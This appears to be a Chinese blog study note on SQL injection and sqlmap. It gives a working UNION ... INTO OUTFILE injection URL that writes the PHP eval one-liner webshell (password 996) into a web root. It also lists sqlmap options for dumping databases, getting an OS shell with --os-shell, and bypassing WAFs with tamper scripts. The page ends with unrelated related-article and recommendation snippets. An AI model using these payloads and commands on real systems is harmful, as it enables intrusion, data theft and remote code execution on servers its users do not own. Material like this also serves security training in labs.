sql上传木马
第十周笔记—SQLmap和sql注入上传木马
目录
SQL注入
上传木马
前提:
- 要知道网站的绝对路径
- 具有写入权限
select 'hello world' into outfile 'c:/abcdef.txt' --路径的斜杠用 /或者\\
--把hello world写入文件中 实战攻击语句:
select * from boy where hid='' union select 11,'hello world'into outfile
'C:/111.txt'; select user()
--查询当前用户名 http://192.168.99.171/test2/sqli/example10.php?catid='3
' union select '<?php @eval($_POST[996])?>',2,3,4
into outfile 'C:/xampp/htdocs/test2/zxh2.php' --+' --后两行为sql注入语句,写入一句话木马
用菜刀连接,网址为木马的路径(不是绝对路径)
一句话木马:<?php @eval($_POST[996])?> --密码为996
用order by(排序)语句试出有多少列
PHP学习网站:
phpstudy
SQLmap
六大模块
- 输入
- 输出
- 发送数据
- 接受数据
- 注入点检测
- 真正攻击模块
命令
参数
-r //读取文件 -u //读取网址 -v 3 //查看sql注入的命令 -flush //清除缓存 --is-dba //是否为dba --os-shell //获取系统shell --dbs //查看所有数据库,命令用完即删 --threads //线程数 --current-db //查看当前网站用的库,命令用完即删 -D "[库名]" //使用指定库 -T "[表名]" //使用指定表 --count //查找有几列,命令用完即删 --colums //查找列名,显示列名和他的类型 -C "[列名]" //使用指定列名,可以用逗号隔开 --dump //把指定列名dump下来,慎用,金融网站犯法 --start 1 //从第一条dump到第二条(不是从0开始取)
--stop 2
三种请求方式
参见图片
取得系统shell
自动上传木马
用x或者q退出,否则会留下木马
原理:传上去一个具有远程命令执行漏洞的页面
条件:
- 绝对路径
- dba超级管理员
命令参数:
--os-shell --web-root="[绝对路径]" //需要上传木马的目录
sqlmap高级注入
--identify-waf //自动测试waf防火墙 --tamper [tamper脚本名称] //手工指定混码脚本绕过,混码:空白符用%20或者%09代替,
//脚本在sqlmap/tamper文件下,多个脚本用逗号隔开
sql上传木马的更多相关文章
- weblogic上传木马路径选择
对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限. 上传需要找到几个点,获取物理路径,如下面三种: 方法1:把shell写 ...
- 绕过图片格式限制上传木马获取WebShell
思路: 图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php 可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的resp ...
- WEB安全:文件上传漏洞
文件上传漏洞过程 用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力. 一般的情况有: 上传文件WEB脚本语言,服务器的WEB容器解释并执行了用户上传的脚本,导致代码执行: ...
- DVWA-全等级文件上传
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法 ...
- WinsockExpert+NC抓包上传之拿WEBSHELL
知识补充: nc上传漏洞在原理上同动网上传漏洞一样,都是利用计算机在读取字符串时,遇到'\0'(00)时,认为字符串结束了,从而丢掉后面的字符串,正如unicode编码特性一样,可被人利用,尽管在这里 ...
- JAE京东云引擎Git上传管理代码教程和京东云数据库导入导出管理
文章目录 Git管理准备工作 Git工具上传代码 发布代码装程序 mywebsql管理 京东云引擎小结 JAE京东云引擎是京东推出的支持Java.Ruby.Python.PHP.Node.js多语 ...
- Kali学习笔记38:文件上传漏洞
早些年,提到Web渗透,或者搜索一些黑客教程 基本都会看到文件上传漏洞. 它是一个很经典的漏洞 但它本质其实不是一个漏洞,而是网站本身的上传文件功能 不过如果我们上传了Webshell,那么就成为了文 ...
- 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...
- 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/ ...
随机推荐
- 3017C语言_文件
第七章 文件 7.1 C语言文件的概念 7.1.1 文件的概念 在此之前,所有的输入和输出只涉及到键盘和显示器.在运行C程序时,我们通过键盘输入数据并借助显示器把程序的运算结果显示出来.但是,计算 ...
- 留存: struts2+jquery+json集成
原文地址:struts2+jquery+json集成 以下采用struts2+jquery+json模拟一个案例.当点击提交按钮时会把输入的数据提交到后台,然后从后台获取数据在客户端显示. 效果如下: ...
- 系列教程 - java web开发
代码之间工作室持续推出Java Web开发系列教程与案例,供广大朋友分享交流技术经验,帮助喜欢java的朋友们学习进步: java web 开发教程(1) - 开发环境搭建 技术交流QQ群: 商务合作 ...
- niaobulashi-一个基于springboot shrio的权限管理系统
github项目地址:https://github.com/niaobulashi/niaobulashi springboot学习地址:http://www.ityouknow.com/spring ...
- zabbix-3.2.6安装部署
一.准备一台虚拟机并安装centos7.x版本系统 二.配置zabbix_server 1.http install: #安装各类软件支持库 yum install apr-devel apr-uti ...
- Spring-Boot + MyBatis-Plus 踩坑记录
这两天在学SpringBoot+MyBatis的开发,配置开发环境和DEMO的过程中踩了很多坑,在这里记录一下. 我的开发环境是idea + JDK 1.8.0.211. 首先展示一下demo的项目整 ...
- Linux系统下解锁Oracle的Scott用户
1).在Oracle用户下面输入命令:lsnrctl status查看监听是否开启,如果未开启则需要开启监听,输入命令:lsnrctl start; 2).如果没有设置监听的话需要先建立一个监听,然后 ...
- Ember报错
错误是ember-data的版本不对 解决办法是: npm install --save ember-data@2.14.2 //bing.com中去查资料,应有尽有
- What?一个 Dubbo 服务启动要两个小时!
前言 前几天在测试环境碰到一个非常奇怪的与 dubbo 相关的问题,事后我在网上搜索了一圈并没有发现类似的帖子或文章,于是便有了这篇. 希望对还未碰到或正在碰到的朋友有所帮助. 现象 现象是这样的,有 ...
- C语言类型转换
int/float to string/array: C语言提供了几个标准库函数,可以将任意类型(整型.长整型.浮点型等)的数字转换为字符串,下面列举了各函数的方法及其说明. itoa():将整型值转 ...